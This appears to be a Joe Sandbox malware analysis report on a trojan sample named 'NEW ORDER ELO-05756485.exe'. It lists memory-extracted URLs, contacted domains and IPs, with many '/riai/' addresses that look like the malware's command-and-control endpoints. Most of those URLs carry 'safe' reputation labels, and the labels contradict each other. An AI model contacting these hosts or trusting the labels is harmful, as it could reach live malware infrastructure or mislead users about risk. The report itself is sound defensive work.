          http://www.architeizer.com/riai/www.happinessmail.com0%Avira URL Cloudsafe
          http://www.skipbinsplus.com/riai/0%Avira URL Cloudsafe
          http://www.goproteinz.com/riai/?Tj=E/PQIKV0Y0+pnMQkqAaMyQKNriDG24+7toFV4fvfu7MpK5DYzrWE6NgrfSqNSLRL+NHh7QLO4w==&RX=dhutZbdHWPcd4ls0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.happinessmail.comReferer:0%Avira URL Cloudsafe
          http://www.happinessmail.com0%Avira URL Cloudsafe
          http://www.architeizer.com/riai/0%Avira URL Cloudsafe
          http://www.dingolope.com/riai/0%Avira URL Cloudsafe
          http://www.dehaochu.com/riai/www.goproteinz.com0%Avira URL Cloudsafe
          http://www.goproteinz.com0%Avira URL Cloudsafe
          http://www.yourbesttacolife.com/riai/0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.yourbesttacolife.com0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.learningfitbit.comReferer:0%Avira URL Cloudsafe
          http://www.upperish.com0%Avira URL Cloudsafe
          http://www.controlservicesreport.com/riai/0%Avira URL Cloudsafe
          http://www.yourbesttacolife.com/riai/www.dingolope.com0%Avira URL Cloudsafe
          http://www.dehaochu.comReferer:0%Avira URL Cloudsafe
          http://www.upperish.comReferer:0%Avira URL Cloudsafe
          http://www.pinupcasino-start.site/riai/www.learningfitbit.com0%Avira URL Cloudsafe
          http://www.architeizer.comReferer:0%Avira URL Cloudsafe
          http://www.yourbesttacolife.comReferer:0%Avira URL Cloudsafe
          http://www.controlservicesreport.comReferer:0%Avira URL Cloudsafe
          http://www.pinupcasino-start.site/riai/0%Avira URL Cloudsafe
          http://www.learningfitbit.com0%Avira URL Cloudsafe
          http://www.learningfitbit.com/riai/0%Avira URL Cloudsafe
          http://www.skipbinsplus.com/riai/www.controlservicesreport.com0%Avira URL Cloudsafe
          http://www.dingolope.com/riai/www.pinupcasino-start.site0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.goproteinz.com/riai/www.thewellbeingsutra.com0%Avira URL Cloudsafe
          http://www.pinupcasino-start.siteReferer:0%Avira URL Cloudsafe
          http://www.stuntmemorabilia.net0%Avira URL Cloudsafe
          http://www.skipbinsplus.comReferer:0%Avira URL Cloudsafe
          http://www.thewellbeingsutra.comReferer:0%Avira URL Cloudsafe
          http://www.architeizer.com0%Avira URL Cloudsafe
          http://www.elevictory.com/riai/0%Avira URL Cloudsafe
          http://www.dingolope.com0%Avira URL Cloudsafe
          http://www.dingolope.comReferer:0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.gammacake.com/riai/www.dehaochu.com0%Avira URL Cloudsafe
          http://www.gammacake.com0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goproteinz.comReferer:0%Avira URL Cloudsafe
          http://www.elevictory.comReferer:0%Avira URL Cloudsafe
          http://www.jumlasx.xyz100%Avira URL Cloudmalware
          http://www.stuntmemorabilia.net/riai/www.yourbesttacolife.com0%Avira URL Cloudsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          www.dingolope.com/riai/0%Avira URL Cloudsafe
          http://www.happinessmail.com/riai/0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.dehaochu.com/riai/?Tj=Ch14F2YiO7tiI9Q2gagIvg9WhlZe2vnmCdhjSvtGFOlHF2WGeYVTjNDjSrDUFLROgZwAm743Yw==&RX=dhutZbdHWPcd4ls0%Avira URL Cloudsafe
          http://www.stuntmemorabilia.net/riai/0%Avira URL Cloudsafe
          http://www.jumlasx.xyzReferer:0%Avira URL Cloudsafe
          http://www.dehaochu.com/riai/0%Avira URL Cloudsafe
          http://www.goproteinz.com/riai/0%Avira URL Cloudsafe
          http://www.stuntmemorabilia.netReferer:0%Avira URL Cloudsafe
          http://www.happinessmail.com/riai/www.jumlasx.xyz0%Avira URL Cloudsafe
          http://www.thewellbeingsutra.com0%Avira URL Cloudsafe
          http://www.thewellbeingsutra.com/riai/0%Avira URL Cloudsafe
          http://www.upperish.com/riai/0%Avira URL Cloudsafe
          http://www.dehaochu.com0%Avira URL Cloudsafe
          http://www.elevictory.com/riai/www.skipbinsplus.com0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.dehaochu.com
          23.82.149.10
          truetrueunknown
          ext-cust.squarespace.com
          198.185.159.144
          truefalse
            high
            goproteinz.com
            34.102.136.180
            truefalse
              unknown
              www.goproteinz.com
              unknown
              unknowntrue
                unknown
                www.gammacake.com
                unknown
                unknowntrue
                  unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.goproteinz.com/riai/?Tj=E/PQIKV0Y0+pnMQkqAaMyQKNriDG24+7toFV4fvfu7MpK5DYzrWE6NgrfSqNSLRL+NHh7QLO4w==&RX=dhutZbdHWPcd4lsfalse
                  • Avira URL Cloud: safe
                  unknown
                  www.dingolope.com/riai/true
                  • Avira URL Cloud: safe
                  low
                  http://www.dehaochu.com/riai/?Tj=Ch14F2YiO7tiI9Q2gagIvg9WhlZe2vnmCdhjSvtGFOlHF2WGeYVTjNDjSrDUFLROgZwAm743Yw==&RX=dhutZbdHWPcd4lstrue
                  • Avira URL Cloud: safe
                  unknown
                  http://www.gammacake.com/riai/?Tj=WtQWSOTzj6QeB4pNJBVQ9tU2A2vUwP0QAZgX7UMYEeL+qDlhyiyE4waWUtaNiZ+URiEIlTuTIg==&RX=dhutZbdHWPcd4lstrue
                  • Avira URL Cloud: safe
                  unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.jumlasx.xyz/riai/explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmptrue
                  • Avira URL Cloud: malware
                  unknown
                  http://www.upperish.com/riai/www.elevictory.comexplorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.pinupcasino-start.siteexplorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.architeizer.com/riai/www.happinessmail.comexplorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.skipbinsplus.com/riai/explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpfalse
                    high
                    http://www.fontbureau.com/designersexplorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpfalse
                      high
                      https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssNEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpfalse
                        high
                        http://www.sajatypeworks.comNEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.founder.com.cn/cn/cTheNEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.happinessmail.comReferer:explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.happinessmail.comexplorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.architeizer.com/riai/explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.dingolope.com/riai/explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.dehaochu.com/riai/www.goproteinz.comexplorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.goproteinz.comexplorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.yourbesttacolife.com/riai/explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.galapagosdesign.com/DPleaseNEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.yourbesttacolife.comexplorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.urwpp.deDPleaseNEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.zhongyicts.com.cnNEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.learningfitbit.comReferer:explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.upperish.comexplorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameNEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpfalse
                          high
                          http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000000.355167796.000000000095C000.00000004.00000020.sdmpfalse
                            high
                            http://www.controlservicesreport.com/riai/explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.yourbesttacolife.com/riai/www.dingolope.comexplorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.dehaochu.comReferer:explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.upperish.comReferer:explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.pinupcasino-start.site/riai/www.learningfitbit.comexplorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.architeizer.comReferer:explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.yourbesttacolife.comReferer:explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.controlservicesreport.comReferer:explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.pinupcasino-start.site/riai/explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.learningfitbit.comexplorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.learningfitbit.com/riai/explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.skipbinsplus.com/riai/www.controlservicesreport.comexplorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.dingolope.com/riai/www.pinupcasino-start.siteexplorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.carterandcone.comlNEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.goproteinz.com/riai/www.thewellbeingsutra.comexplorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.fontbureau.com/designers/frere-jones.htmlNEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpfalse
                              high
                              http://www.pinupcasino-start.siteReferer:explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.stuntmemorabilia.netexplorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.skipbinsplus.comReferer:explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.thewellbeingsutra.comReferer:explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.architeizer.comexplorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.elevictory.com/riai/explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.fontbureau.com/designersGNEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpfalse
                                high
                                http://www.dingolope.comexplorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.dingolope.comReferer:explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.fontbureau.com/designers/?NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.founder.com.cn/cn/bTheNEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designers?NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.tiro.comexplorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.gammacake.com/riai/www.dehaochu.comexplorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.gammacake.comexplorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.goodfont.co.krNEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.goproteinz.comReferer:explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.elevictory.comReferer:explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.jumlasx.xyzexplorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://www.stuntmemorabilia.net/riai/www.yourbesttacolife.comexplorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.typography.netDNEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.galapagosdesign.com/staff/dennis.htmNEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://fontfabrik.comNEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.happinessmail.com/riai/explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.fonts.comNEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.sandoll.co.krNEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.sakkal.comNEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.stuntmemorabilia.net/riai/explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.jumlasx.xyzReferer:explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmptrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.dehaochu.com/riai/explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.apache.org/licenses/LICENSE-2.0NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.fontbureau.comNEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.goproteinz.com/riai/explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.stuntmemorabilia.netReferer:explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.gnu.org/licenses/NEW ORDER ELO-05756485.exefalse
                                            high
                                            http://www.happinessmail.com/riai/www.jumlasx.xyzexplorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.thewellbeingsutra.comexplorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.thewellbeingsutra.com/riai/explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.upperish.com/riai/explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.dehaochu.comexplorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.elevictory.com/riai/www.skipbinsplus.comexplorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.fontbureau.com/designers/cabarga.htmlNNEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpfalse
                                              high
                                              http://www.founder.com.cn/cnNEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.elevictory.comexplorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.thewellbeingsutra.com/riai/www.stuntmemorabilia.netexplorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.learningfitbit.com/riai/www.upperish.comexplorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.jiyu-kobo.co.jp/NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.controlservicesreport.com/riai/www.architeizer.comexplorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.gnu.orgNEW ORDER ELO-05756485.exefalse
                                                high
                                                http://www.fontbureau.com/designers8NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://www.controlservicesreport.comexplorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.gammacake.comReferer:explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.skipbinsplus.comexplorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.gammacake.com/riai/explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown

                                                  Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  198.185.159.144
                                                  ext-cust.squarespace.comUnited States
                                                  53831SQUARESPACEUSfalse
                                                  23.82.149.10
                                                  www.dehaochu.comUnited States
                                                  396190LEASEWEB-USA-SEA-10UStrue
                                                  34.102.136.180
                                                  goproteinz.comUnited States
                                                  15169GOOGLEUSfalse

                                                  General Information

                                                  Joe Sandbox Version:31.0.0 Emerald
                                                  Analysis ID:383983
                                                  Start date:08.04.2021
                                                  Start time:13:34:11
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 10m 34s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:light
                                                  Sample file name:NEW ORDER ELO-05756485.exe
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                  Number of analysed new started processes analysed:23
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:1
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.evad.winEXE@7/1@3/3
                                                  EGA Information:Failed
                                                  HDC Information:
                                                  • Successful, ratio: 16.7% (good quality ratio 15.2%)
                                                  • Quality average: 74.2%
                                                  • Quality standard deviation: 30.7%
                                                  HCA Information:
                                                  • Successful, ratio: 98%
                                                  • Number of executed functions: 0
                                                  • Number of non-executed functions: 0
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  • Found application associated with file extension: .exe
                                                  Warnings:
                                                  Show All
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                  • Excluded IPs from analysis (whitelisted): 40.88.32.150, 52.255.188.83, 13.88.21.125, 168.61.161.212, 20.82.210.154, 23.10.249.26, 23.10.249.43, 104.42.151.234, 104.43.139.144, 23.0.174.185, 23.0.174.200, 52.155.217.156, 20.54.26.129, 95.100.54.203
